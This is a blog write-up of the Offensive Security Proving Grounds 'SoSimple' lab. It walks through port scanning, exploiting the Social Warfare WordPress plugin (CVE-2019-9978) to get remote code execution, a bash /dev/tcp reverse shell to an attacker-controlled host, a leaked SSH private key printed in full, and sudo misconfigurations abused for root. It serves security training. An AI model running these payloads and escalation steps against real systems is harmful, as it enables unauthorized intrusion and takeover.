Skip to main content
Hashnodejamarir's blogjamarir's blog

Command Palette

Search for a command to run...

[Offensive Security] Proving Grounds - SoSimple

Updated
7 min read
[Offensive Security] Proving Grounds - SoSimple
J
jamarir
Pentester, CTF Player, Game Modder, Gam© B̷̢̡̨̢̡̡̡̧̢̡̧̛͓̤͓̦͖̘̪͓̹̙̹̣͇̲̘̭̯͍͕̥̳̖̙͔̱̥̯̪̝̤̫̘̹̘̬̬̬̠͉͓̯̼̥̩̼̗̯̜͎̳͈̙̺̗̦̯͕͎̼͓̭̮̩̲͇͇͈̬͚̙̠͎͚̳̥̮̳͇̫͙̺͈̗̟͉͕̰̣̯̻͔͚͖̳̗̼͇̗̫͈͉̠̲͉͙̣̭̳̳̰̥̜̗̙̫͎̫̲͕̭͖̖̥̰̙̞͇̪̞̠̥̭̳̣̠̳͓̒͑̀̎̈̎͂̐͆͒͆̒͌͒̔̽͌̐͊̈̀̅̈́̂̑͛̽͐̈́̒̋̓̍̿̔̔͌͘͘̚͜͜͜͜͜͜͠͠͝͠͝ư̵̧̡̧̧̨̡̨̢̢̢̨̧̧̢̢̢̨̢̡̢̢̛̰̱̜͖̯̮̬̙͈̳̙̲̣̺͕̤͓̪̖̫̬͈̩̝͚̪̫̻̖̺̳͎͓̥̯̖̪̣̪̥͍͉̺̙̠͔͖̪͖̥͇̞͈̙̺̙̻̙͍̯͔̮͖͓̞̳̞̫͔̯̖̳̪͔̳̩͉̠̰̘̱͚͕̟̺̝̼͎̥̠̜̫̖̥̼̻̫̘͕͚̠̰̯͔̰̦̥̪͕̠̭͇̝̬͖̤͇͇̥͍̟̠̙͓͓̜͕̲̞̪͚̭͎͓̺̩̯͎͙̻͎̘̹̣̬͚͙̺̣͈̱̣̭̺̻̦͈̦͚͍͈̩̘̥͓̘̪̮̗̮̫̠̫̞͚̔̎̂̆̓͊̋́̌̎̿̂̆͌̃́͛͒̿͑̊̆͐̄̎̃̌͂̈͗̽͐̾̾̔͌̋̾͐͑̕͜͜͜͜͝ͅͅͅͅg̶̢̢̡̧̡̡̧̡̡̢͖̦̝͍͓̳̻̦̤̭̩̜̯̳̣̱̼̙͈̮̝̝̬͇̬̞͇̭̙̤͎̲͓̦̩̜̺͉̘͙͍̖͚͔̠̲̭͆̓͛̋̔̾̆̈́͒̍͛̍́͌̑̐͒̚̕̚͜ͅͅͅ Hunte | CRTO
Part of seriesNix

Just another wpscan Unauthenticated RCE / RSA Key Leak / service SUDO -L'ed / writable sh script SUDO-L'ed Write-up.

CTF Link (VulnLab).

This is an easy level VM with some rabbitholes. Enumeration is key to find your way in. There are three flags (2 user and 1 root flag).

Good luck and have fun!

CTF Link (Offsec).

Keep it simple.

Engage in enumeration, web enumeration, and WordPress enumeration techniques to identify vulnerabilities. Utilize privilege escalation strategies and harness the abuse of sudo permissions to enhance your access. This lab is designed to capitalize on your skills in vulnerability exploitation.

Footprinting

Open ports

Nmap scans showed the services SSH and HTTP are opened:

kali@kali:~$ sudo nmap -sS --top-ports=5000 -Pn -v10 -oA syn_full 192.168.174.78
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

kali@kali:~$ sudo nmap -sC -sV -p22,80 -Pn -v10 -oA vuln 192.168.174.78
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 5b:55:43:ef:af:d0:3d:0e:63:20:7a:f4:ac:41:6a:45 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDZJ+y+c4YDmXPBY8hytP7uA0bmTKJfUnWpZn1744GxKheNmQqG98tALhL+Hz4OxWRhLzoGa/klypcYMEstzpopxZvLIUil5PPfrCTW+dwCixiULgi8Q9ImfBgKNYaQ6aog7qXG0N0GUazyJj/O2Sfx8qc32cvgh27SOOfiIvZ3s3xeh1DOqjC1kEkzJG9YeMRKRc0AC2TCtRmGbvBGL3iKjjuLS+lXxgtNEnjGI3m+n7RwgMDe0iv82ThCc1oRjeTEysstm4baIJvsdRs/trfvV/2cfAAfl77B0p6HS3rPWZYj2WCoSyG6Z3bK+kjjt+FG5V+zhQ8G4yntT/brCIXGa0iSe1vGrLk6dIrRsmbPsG3V3dkggyOL/aWkL6Q2bnb3suFINJ98Hvjd9Pe3ngsnv5iefgRaHwu/GgP7sVpLsKGdvo2smS7PTmHrZFqP74SeGC+TQ2BIhxYe9uAoL5NRappcCyA0ZF3kB9907nSggM/1bZ2uXnWqzKwPD5dBvTM=
|   256 53:f5:23:1b:e9:aa:8f:41:e2:18:c6:05:50:07:d8:d4 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO/ko3XtMH5m6keCi750yCg/B93iEWSBbyGrmJZ4sHThaowuRlW6sm/WuHR6AUeoCsU0su07XVlgPtCJOf35ByU=
|   256 55:b7:7b:7e:0b:f5:4d:1b:df:c3:5d:a1:d7:68:a9:6b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKkLRPLyIQqo5WToErae3vTYq6M2ZYupOFtsl1oNG0rp
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: So Simple
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD

HTTP

Enumeration

ffuf can be used to enumerate the resources in the web server:

kali@kali:~$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50 -u http://192.168.174.78 0
.               [Status: 200, Size: 495, Words: 47, Lines: 78]
/               [Status: 200, Size: 495, Words: 47, Lines: 78]
index.html      [Status: 200, Size: 495, Words: 47, Lines: 78]
wordpress/      [Status: 200, Size: 13420, Words: 520, Lines: 148]

Down the rabbit holes

In the Wordpress website, we can enumerate users. For instance, the user test doesn't exist when entered as a login:

>>>
POST /wordpress/wp-login.php HTTP/1.1
Host: 192.168.174.78

log=test&pwd=password&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.174.78%2Fwordpress%2Fwp-admin%2F&testcookie=1

<<<
Unknown username. Check again or try your email address.

Whereas admin exists:

>>>
POST /wordpress/wp-login.php HTTP/1.1
Host: 192.168.174.78

log=admin&pwd=password&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.174.78%2Fwordpress%2Fwp-admin%2F&testcookie=1

<<<
The password you entered for the username admin is incorrect. Lost your password?

However, I couldn't crack admin's password using Hydra :/:

kali@kali:~$ hydra -f -t 16 -l jamarir -P /usr/share/wordlists/rockyou.txt 192.168.174.78 http-post-form "/wordpress/wp-login.php:log=admin&pwd=^PASS^&wp-submit=Log+In:F=Error"

Wordpress plugin exploit

wpscan revealed the plugins used by the Wordpress CMS:

kali@kali:~$ wpscan --url http://192.168.174.78/wordpress |tee -a wordpress.txt
kali@kali:~$ grep -E 'Location.*plugins/' wordpress.txt
 | Location: http://192.168.174.78/wordpress/wp-content/plugins/simple-cart-solution/
 | Location: http://192.168.174.78/wordpress/wp-content/plugins/social-warfare/

In particular, the social-warface plugin seems exploitable :]

kali@kali:~$ searchsploit wordpress social warfare
------------------------ ---------------------------------
 Exploit Title          |  Path
------------------------ ---------------------------------
WordPress Plugin Social | php/webapps/46794.py
------------------------ ---------------------------------

This exploit allows to perform an Unauthenticated Remote Code Execution through the swp_url GET parameter (CVE-2019-9978):

kali@kali:~$ searchsploit -x 46794
[...]
    VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s"
[...]

The vulnerable version of the plugin (3.5.2) uses a script (lib/utilities/SWP_Database_Migration.php) which executes the eval() function:

[...]
if ( true == SWP_Utility::debug('load_options') ) {
[...]
            $options = file_get_contents($_GET['swp_url'] . '?swp_debug=get_user_options');
[...]
            $array = 'return ' . $options . ';';
            try {
                $fetched_options = eval( $array );
            }

            $pre = strpos($options, '<pre>');
            if ($pre != 0) {
                wp_die('No Social Warfare found.');
            }

            $options = str_replace('<pre>', '', $options);
            $cutoff = strpos($options, '</pre>');
            $options = substr($options, 0, $cutoff);
[...]

The condition above is true if the swp_debug GET parameter is set to load_options, as we can see in the lib/utilities/SWP_Utility.php script:

    /**
     * Checks to see if a debugging query paramter has been set.
     *
     * @since  2.1.0
     * @since  3.3.0 | 14 AUG 2018 | Refactored to a one-liner.
     * @access public
     * @param  string $type The query paramter to check for.
     *
     * @return bool True if the specified key is set for debugging, else false.
     *
     */
    public static function debug( $key = '' ) {
        return !empty( $_GET['swp_debug'] ) && ( strtolower( $_GET['swp_debug'] ) == strtolower( $key ) );
    }

On top of that, the payload must contain the "<pre>" string, otherwise the vulnerable input is not processed:

            $pre = strpos($options, '<pre>');
            if ($pre != 0) {
                wp_die('No Social Warfare found.');
            }

As a result, we get an RCE by injecting a link to a malicious script we host in the swp_url GET parameter:

kali@kali:~$ cat phpinfo.txt
<pre>

phpinfo();

</pre>

kali@kali:~$ python -m http.server --bind 192.168.49.174 48888

>>>
GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.174:48888/phpinfo.txt HTTP/1.1
Host: 192.168.174.78

<<<
[phpinfo results]

Finally we get a reverse shell :)

kali@kali:~$ cat revshell.txt
<pre>

system("bash -c 'bash -i >& /dev/tcp/192.168.49.174/49999 0>&1'")

</pre>

kali@kali:~$ nc -nlvp 49999

>>>
GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.174:48888/revshell.txt HTTP/1.1
Host: 192.168.174.78

<<<
listening on [any] 49999 ...
connect to [192.168.49.174] from (UNKNOWN) [192.168.174.78] 36624
bash: cannot set terminal process group (946): Inappropriate ioctl for device
bash: no job control in this shell
www-data@so-simple:/var/www/html/wordpress/wp-admin$

Local privilege Escalation

local.txt

www-data

There are 3 loggable users:

www-data@so-simple:/$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
max:x:1000:1000:roel:/home/max:/bin/bash
steven:x:1001:1001:Steven,,,:/home/steven:/bin/bash

In max's folder, we see the first flag in local.txt is readable by anyone:

www-data@so-simple:/home/max$ ls -la
total 52
drwxr-xr-x 7 max  max  4096 Aug 22  2020 .
drwxr-xr-x 4 root root 4096 Jul 12  2020 ..
lrwxrwxrwx 1 max  max     9 Aug 22  2020 .bash_history -> /dev/null
-rw-r--r-- 1 max  max   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 max  max  3810 Jul 12  2020 .bashrc
drwx------ 2 max  max  4096 Jul 12  2020 .cache
drwx------ 3 max  max  4096 Jul 12  2020 .gnupg
drwxrwxr-x 3 max  max  4096 Jul 12  2020 .local
-rw-r--r-- 1 max  max   807 Feb 25  2020 .profile
drwxr-xr-x 2 max  max  4096 Jul 14  2020 .ssh
-rw-r--r-- 1 max  max    33 Apr  1 19:42 local.txt
-rw-r--r-- 1 max  max    49 Jul 12  2020 personal.txt
drwxrwxr-x 3 max  max  4096 Jul 12  2020 this
-rwxr-x--- 1 max  max    43 Aug 22  2020 user.txt

www-data@so-simple:/home/max$ cat local.txt
c0[...]06

root.txt

Now we must escalate our privileges to the root user. We'll first impersonate max

M4x3d

In max's folder, there is an interesting personal.txt file:

www-data@so-simple:/home/max$ cat personal.txt
SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=

Decoding the base64 text shows:

www-data@so-simple:/home/max$ base64 -d personal.txt
Hahahahaha, it's not that easy !!!

Note that navigating into the this folder is a rabbit hole:

www-data@so-simple:/home/max$ cd this/is/maybe/the/way/to/a
www-data@so-simple:/home/max/this/is/maybe/the/way/to/a$ ls
password
private_key
rabbit_hole

www-data@so-simple:/home/max/this/is/maybe/the/way/to/a$ cat rabbit-hole.txt
             _\_.                  ._/_
          .\'    ```-`\|    |/'-'''    `/.
        .\'            \|  |/            `/.
     \.\'               \||/               `/./
    .'              ._._ || _._.              `.
   ./             ./'  | || |  `\.             \.
  /'            .'\ \  / /\ \  / /`.            `\
 /|            /|  \ \/ /..\ \/ /  |\            |\
 /|            /  /'   .\||/.   `\  \            |\
  /|          /` .'.---.    .---.`. '\          |\
   '/-/|--|-/'  / /     \  /     \ \  `\-|--|\-\`
               | /       \/       \ |
               | `.   ._()()_.   .' |
            _\_\|  `._\.    ./_.'  |/_/_
        \_\`            \__/            '/_/
      \`    ____     o   /\   o     ____    '/
      =   .'`.   o    o /  \ o   o    .'`.   =
      '/  |   `._____..'    `.._____.'   |  \`
      -/        \                  /        \-
       '/-       \       ..       /       -\`
         '/     _.\      `'      /._     \`
          '//-''   \     ||     /   ``-\\`
                    \____/\____/

What about the folders ?

www-data@so-simple:/home/max/this/is/maybe/the/way/to/a$ cat password/password.txt
Haha, you wish!! :)

And the private RSA key ?

www-data@so-simple:/home/max/this/is/maybe/the/way/to/a$ cat private_key/id_rsa
-----BEGIN RSA Rubbish Key-----
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnm
-----END RSA Rubbish Key-----

Actually, the private key was directly readable inside the .ssh folder:

www-data@so-simple:/home/max$ cat .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Thus, we can connect as max using SSH, and no password is required:

kali@kali:~$ ssh2john id_rsa_max  > hash_max.txt
id_rsa_max has no password!

kali@kali:~$ ssh -i id_rsa_max max@192.168.174.78

St3v3n3d

Interestingly, we can elevate as steven without password:

max@so-simple:~$ sudo -l
Matching Defaults entries for max on so-simple:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User max may run the following commands on so-simple:
    (steven) NOPASSWD: /usr/sbin/service

max@so-simple:~$ sudo -u steven /usr/sbin/service
Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]

max@so-simple:~$ sudo -u steven /usr/sbin/service ../../bin/sh
steven@so-simple:~$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)

There is no interesting file within steven's personal folder:

steven@so-simple:~$ cat user2.txt
This is not the flag you're looking for..

R00t3d

But steven can run the command /opt/tools/server-health.sh as root with no password:

steven@so-simple:~$ sudo -l
Matching Defaults entries for steven on so-simple:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User steven may run the following commands on so-simple:
    (root) NOPASSWD: /opt/tools/server-health.sh

However, the script server-health doesn't exist:

steven@so-simple:~$ sudo /opt/tools/server-health.sh
sudo: /opt/tools/server-health.sh: command not found

Therefore, we can easily create a script that spawns a shell:

steven@so-simple:~$ vim /opt/tools/server-health.sh
#!/bin/bash
bash

steven@so-simple:~$ chmod +x /opt/tools/server-health.sh

And become root :)

steven@so-simple:~$ sudo /opt/tools/server-health.sh
# id
uid=0(root) gid=0(root) groups=0(root)
# ls /root/
flag.txt  proof.txt  snap
# cat /root/*
This is not the flag you're looking for...
ed[...]70
#hacking#ctf#offensive-security#vulnhub#pentesting

Comments

Join the discussion

No comments yet. Be the first to comment.

Nix

Part 8 of 15

Article Series: Unix CTFs ¯¯̿̿¯̿̿'̿̿̿̿̿̿̿'̿̿'̿̿̿̿̿'̿̿̿)͇̿̿)̿̿̿̿ '̿̿̿̿̿̿\̵͇̿̿\=(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

Up next

[HackTheBox] BountyHunter

Just another PHP XXE Leak / Password Spray / Python script's eval() SUDO -L'ed Privesc Write-up. Machine link. IppSec Walkthrough. Footprinting Open ports Nmap SYN scan shows only SSH and HTTP services are opened: kali@kali:~$ sudo nmap -sS -p- -P...

More from this blog

J

jamarir's blog

40 posts

Just another inoS̸̡̨̹͎͋̉̈́́̚ec blog. Why ? Because teaching oneself iS̵̢̢̡̢̟̮̘̬̹͖͇̺̪͖̬͚̝͈͇̣̺̮̝̤̺͚͊̓̈́̔̐̋̒̓͂͆̌̓̉̿͑͐̿̒̈́̉͊́͆̿̓̕͘͠ͅ the best way to le©rn. Only hack your own/allowed environments.